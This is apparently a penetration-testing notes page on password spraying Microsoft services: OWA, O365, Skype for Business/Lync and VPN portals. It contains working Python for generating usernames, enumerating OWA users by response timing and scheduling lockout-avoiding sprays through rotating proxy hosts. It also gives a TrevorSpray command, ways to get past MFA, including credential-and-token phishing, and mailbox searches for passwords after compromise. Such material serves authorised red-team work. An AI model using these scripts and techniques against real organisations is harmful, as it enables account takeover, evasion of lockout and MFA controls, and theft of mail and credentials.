Password Spray

Toolkit

Potential Targets

  • Skype4Business

  • OWA Portals

  • VPN Portals

  • JBoss/Jira/Zoho and other work-management portals

  • Employee portals

Username Generator
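Added example for this section (not a tool from the original notes): turn a list of real names scraped during OSINT into candidate usernames in the formats organisations commonly use, so the user-enumeration and spray steps below have something to test. The input names, the domain "contoso.com" and the set of formats are assumptions; generate every format and let the timing attack or spray tell you which one the target actually uses.

```python
# Added example (not part of the original notes): candidate usernames from
# "First Last" names. Input names below are constructed for the demo.
import re

# Hypothetical OSINT output (LinkedIn, company site, conference lists).
SAMPLE_NAMES = [
    "John Smith",
    "Mary-Ann O'Brien",
    "Jane Doe",
    "john smith",        # duplicate in different case, must collapse
    "Madonna",           # single token, cannot be formatted
]

# Each format is a function of (first, last). Which one the target uses is
# unknown, so all are generated; the spray/enumeration step decides.
FORMATS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "firstlast":  lambda f, l: f"{f}{l}",
    "flast":      lambda f, l: f"{f[0]}{l}",
    "first_last": lambda f, l: f"{f}_{l}",
    "lastf":      lambda f, l: f"{l}{f[0]}",
    "first":      lambda f, l: f,
    "last.first": lambda f, l: f"{l}.{f}",
}


def normalise(part: str) -> str:
    """Lower-case and drop characters that do not appear in sAMAccountNames
    or UPN local parts (hyphens, apostrophes, accents already stripped)."""
    return re.sub(r"[^a-z0-9]", "", part.lower())


def split_name(full: str):
    """'Mary-Ann O'Brien' -> ('maryann', 'obrien'); None for single-token names."""
    tokens = full.strip().split()
    if len(tokens) < 2:
        return None
    first, last = normalise(tokens[0]), normalise(tokens[-1])
    if not first or not last:
        return None
    return first, last


def generate_usernames(names, domain=None, formats=FORMATS):
    """De-duplicated, order-preserving candidate list. With `domain` set each
    candidate becomes a UPN-style address (user@domain) for O365/OWA sprays."""
    seen, out = set(), []
    for full in names:
        parts = split_name(full)
        if not parts:
            continue
        first, last = parts
        for fmt in formats.values():
            user = fmt(first, last)
            if domain:
                user = f"{user}@{domain}"
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    for u in generate_usernames(SAMPLE_NAMES, domain="contoso.com"):
        print(u)
```

Feed the output to the OWA/Skype4B timing attack first and spray only the confirmed format; spraying all seven formats for every name multiplies the request count (and the noise) for no gain.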

IP Rotation

  • Burp Extension: IPRotate

    • BHIS Blog : Link

    • AWS Keys Setup : Link

    • Proxycannon

    • Amazon Lambda

Attacking OWA

  • Metasploit: scanner/http/owa_login

    • Automatically flags valid usernames: when a bad password is submitted, an existing account is rejected faster than a non-existent one, so the module treats the faster responses as likely-valid users (timing side channel, no lockout risk from a single attempt per user).
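Added example (not the Metasploit module's code) of the timing-based enumeration described above: one logon with a fixed wrong password per candidate, then classify by response time against the median. The OWA URL, the form field names and the sample timings are assumptions; the classifier is the part worth keeping, and it is what the test exercises.

```python
# Added example: OWA timing-based user enumeration. Not scanner/http/owa_login;
# same idea in ~40 lines of stdlib Python. Target URL and timings are made up.
import ssl
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request


def owa_auth_time(base_url, domain, username, password="WrongPassword1!", timeout=20):
    """POST one forms-based logon to /owa/auth.owa and return round-trip seconds.
    Field names mirror the OWA logon form (verify against your target's HTML)."""
    data = urllib.parse.urlencode({
        "destination": f"{base_url}/owa/",
        "flags": "4",
        "forcedownlevel": "0",
        "username": f"{domain}\\{username}",
        "password": password,
        "isUtf8": "1",
    }).encode()
    req = urllib.request.Request(f"{base_url}/owa/auth.owa", data=data, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    ctx = ssl._create_unverified_context()  # engagement targets rarely have valid certs
    start = time.perf_counter()
    try:
        urllib.request.urlopen(req, timeout=timeout, context=ctx).read()
    except urllib.error.HTTPError:
        pass  # a 4xx is still a valid timing sample
    return time.perf_counter() - start


def classify_by_timing(timings, factor=0.5, min_gap=0.2):
    """Split {username: seconds} into (likely_valid, likely_invalid).

    Most names in a scraped list do not exist, so the median response time is
    a fair estimate of the 'invalid' baseline. A name is called valid only if
    it is faster than factor*baseline AND at least min_gap seconds quicker,
    which keeps jitter on a fast server from producing false positives."""
    if len(timings) < 3:
        raise ValueError("need at least three samples to estimate a baseline")
    baseline = statistics.median(timings.values())
    valid = sorted(u for u, t in timings.items()
                   if t < baseline * factor and baseline - t >= min_gap)
    invalid = sorted(set(timings) - set(valid))
    return valid, invalid


def enumerate_users(base_url, domain, candidates, **classifier_kw):
    """One timed request per candidate, sequentially, then classify."""
    timings = {u: owa_auth_time(base_url, domain, u) for u in candidates}
    return classify_by_timing(timings, **classifier_kw)


# Constructed timings of the shape a real run produces (not captured anywhere).
SAMPLE_TIMINGS = {
    "jsmith": 0.36, "mdoe": 1.41, "rjones": 1.38,
    "abrown": 0.42, "tlee": 1.52, "zzznobody": 1.47,
}

if __name__ == "__main__":
    print(classify_by_timing(SAMPLE_TIMINGS))
```

Two caveats the median trick does not cover: always include a name that certainly does not exist (a canary such as "zzznobody") so you can see the baseline, and if most of your list turns out to be valid the median flips to the fast side and nothing gets flagged; in that case compare against the canary instead.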

Attacking O365

 ./trevorspray.py -e emails.txt --passwords "Winter2021!"  --delay 15 --no-current-ip --ssh ubuntu@<IP> ubuntu2@<IP2> -k privkey.pem

  • One password across the whole email list, 15 seconds between requests, and never from the operator's own IP: every request is round-robined through the listed SSH hosts (used as SOCKS proxies, authenticated with privkey.pem).
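Added example (not TrevorSpray's code) of the scheduling behind a command line like the one above: one password per round across every user, a pause between rounds long enough for the lockout counter to reset, and round-robin egress through proxy hosts. The lockout policy values, user names and host names are assumptions; confirm the real policy (net accounts / Get-ADDefaultDomainPasswordPolicy / the O365 Smart Lockout settings) before spraying.

```python
# Added example: lockout-safe spray scheduling. Not TrevorSpray; the same
# knobs (delay, egress rotation) expressed as a plan you can inspect first.
import itertools
import time
from dataclasses import dataclass


@dataclass
class LockoutPolicy:
    threshold: int       # bad passwords before lockout; 0 means no lockout
    window_seconds: int  # observation window after which the counter resets


@dataclass
class Attempt:
    username: str
    password: str
    egress: str          # SSH/SOCKS host (or "direct") this request leaves through
    wait_before: float   # seconds to sleep before sending it


def plan_spray(users, passwords, policy, delay=15.0, egress=("direct",), safety=1.2):
    """Yield Attempts in password-first order.

    Each round gives every user exactly one attempt, so no account collects
    more than one bad password per window. The first attempt of round N+1
    waits until window_seconds * safety has passed since round N started, so
    the counters have reset. A threshold of 1 cannot be sprayed safely at all.
    """
    if policy.threshold == 1:
        raise ValueError("lockout threshold of 1: one wrong password locks the account")
    rotation = itertools.cycle(egress)
    round_len = delay * max(len(users) - 1, 0)   # first to last request of a round
    for round_no, password in enumerate(passwords):
        for i, user in enumerate(users):
            if i > 0:
                wait = delay
            elif round_no == 0:
                wait = 0.0
            elif policy.threshold:
                wait = max(policy.window_seconds * safety - round_len, delay)
            else:
                wait = delay
            yield Attempt(user, password, next(rotation), wait)


def run_spray(plan, send, sleep=time.sleep):
    """Drive a plan: sleep as scheduled, call send(attempt) -> bool, return hits.

    `send` is whatever talks to the portal (OWA, O365, VPN) and is injected so
    the scheduler can be exercised without a target.
    """
    hits = []
    for attempt in plan:
        sleep(attempt.wait_before)
        if send(attempt):
            hits.append((attempt.username, attempt.password))
    return hits


if __name__ == "__main__":
    policy = LockoutPolicy(threshold=5, window_seconds=1800)  # assumed values
    plan = plan_spray(["jsmith", "mdoe", "abrown"], ["Winter2021!", "Spring2022!"],
                      policy, delay=15, egress=("ubuntu@10.0.0.1", "ubuntu2@10.0.0.2"))
    for a in plan:
        print(f"+{a.wait_before:7.1f}s  {a.egress:20} {a.username}:{a.password}")
```

Printing the plan before running it is the check worth keeping: the gap between rounds is where sprays go wrong, and seeing "+2130.0s" next to the first user of round two makes the wait explicit instead of buried in a sleep call.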

Skype4Business [Lync Servers]

Skype4B provides a bridge from the Internet into a company's internal network: its web services authenticate against Active Directory, so an attacker can interact with the internal AD environment without being on the LAN.

Lync servers can provide many goodies for an attacker. All the same treasures that can be had with Outlook Web Access (OWA) portals can be had with Lync servers. This includes: internal-domain name disclosure, user enumeration via the AD timing attack, and even password spraying.

Reference:

Tool

Locating the Front-End Server

Microsoft’s recommended naming format for the autodiscover URL is:

  • https://lyncdiscover.<domain>.com (external)

  • https://lyncdiscoverinternal.<domain>.com (internal)

If the ‘lyncdiscover’ subdomain does not exist, all is not lost. The following subdomains will often point to the Front-End server and are worth investigating.

  • dialin.contoso.com

  • scheduler.contoso.com

  • meet.contoso.com

If the autodiscover response (JSON by default, XML if requested) references the domain 'online.lync.com', the Skype server in question is hosted by Microsoft (Skype for Business Online) and the on-prem attacks below will not work.
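Added example (not from the original notes) for the discovery steps above: build the candidate hostnames for a domain, resolve them, and read an autodiscover response to separate a customer-run Front-End from a Microsoft-hosted tenant. The two response bodies are constructed to match the shape of the real lyncdiscover JSON; the hostnames in them are made up.

```python
# Added example: Skype4B/Lync Front-End discovery. Sample responses are
# constructed, not captured; run with a real domain to resolve the names.
import json
import re
import socket
from urllib.parse import urlparse


def candidate_hosts(domain):
    """Hostnames worth resolving, in the order the notes list them."""
    return [f"{sub}.{domain}" for sub in
            ("lyncdiscover", "lyncdiscoverinternal", "dialin", "scheduler", "meet")]


def resolve_all(domain):
    """{hostname: ip or None}; None means the name does not resolve."""
    out = {}
    for host in candidate_hosts(domain):
        try:
            out[host] = socket.gethostbyname(host)
        except socket.gaierror:
            out[host] = None
    return out


def discovered_hosts(body):
    """Every https host referenced by an autodiscover response. Lyncdiscover
    answers JSON by default and XML if asked for it; a URL regex over the raw
    body handles both without caring which one came back."""
    urls = re.findall(r"https?://[^\s\"'<>]+", body)
    return sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})


def is_microsoft_hosted(body):
    """True when autodiscover points at Skype for Business Online."""
    return any(h.endswith("online.lync.com") for h in discovered_hosts(body))


def frontend_hosts(body):
    """Hosts that are not Microsoft's cloud service, i.e. the customer's own
    Front-End / external web services that take NTLM auth."""
    return [h for h in discovered_hosts(body) if not h.endswith("online.lync.com")]


# Constructed on-prem response: links point at the customer's own hostnames.
ONPREM_RESPONSE = json.dumps({"_links": {
    "self": {"href": "https://lyncdiscover.contoso.com/Autodiscover/AutodiscoverService.svc/root"},
    "user": {"href": "https://lyncweb.contoso.com/Autodiscover/AutodiscoverService.svc/root/oauth/user"},
    "xframe": {"href": "https://lyncweb.contoso.com/Autodiscover/XFrame/XFrame.html"}}})

# Constructed cloud response: everything lands on online.lync.com, so stop here.
CLOUD_RESPONSE = json.dumps({"_links": {
    "self": {"href": "https://webdir.online.lync.com/Autodiscover/AutodiscoverService.svc/root"},
    "user": {"href": "https://webdir.online.lync.com/Autodiscover/AutodiscoverService.svc/root/oauth/user"}}})


if __name__ == "__main__":
    import sys
    domain = sys.argv[1] if len(sys.argv) > 1 else "contoso.com"
    for host, ip in resolve_all(domain).items():
        print(f"{host:40} {ip or 'NXDOMAIN'}")
    print("on-prem front-end hosts:", frontend_hosts(ONPREM_RESPONSE))
    print("cloud tenant?", is_microsoft_hosted(CLOUD_RESPONSE))
```

The "user" link is the one to keep: it names the external web services host, which is where the /WebTicket, /abs/ and other NTLM-protected paths listed below live.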

Web Login Portals

Two login portals that are commonly enabled in Skype4B installations:

  • Dial-in Conferencing :

    • lyncdiscover.domain.com/dialin

    • dialin.domain.com

  • Web Scheduler:

    • lyncdiscover.domain.com/scheduler

    • scheduler.domain.com

  • Other paths that will likely be protected with NTLM authentication include:

    • /WebTicket/WebTicketService.svc
    • /abs/
    • /GroupExpansion
    • /CertProv
    • /RgsClients
    • /RequestHandlerExt
    • /mcx

Bypass 2-FA

  • MFASweep: takes a valid credential and checks which Microsoft services (web portal, Graph, Azure management, EWS, ActiveSync, ADFS) accept it without MFA.

  • CredSniper: phishing framework that captures the credential and the 2FA token together.

  • Re-using valid credentials on alternate services that are not behind MFA.

  • MailSniper: searches mailboxes over EWS, which is often reachable with legacy authentication and therefore outside the MFA policy.

Exchange Server

  • If you get access to a mailbox, pull down the Global Address List (e.g. MailSniper's Get-GlobalAddressList).

  • Password spray again with this new, complete list of targets.

  • Use MailSniper (Invoke-SelfSearch / Invoke-GlobalMailSearch) to search mail for keywords such as "password", "VPN" or "creds".
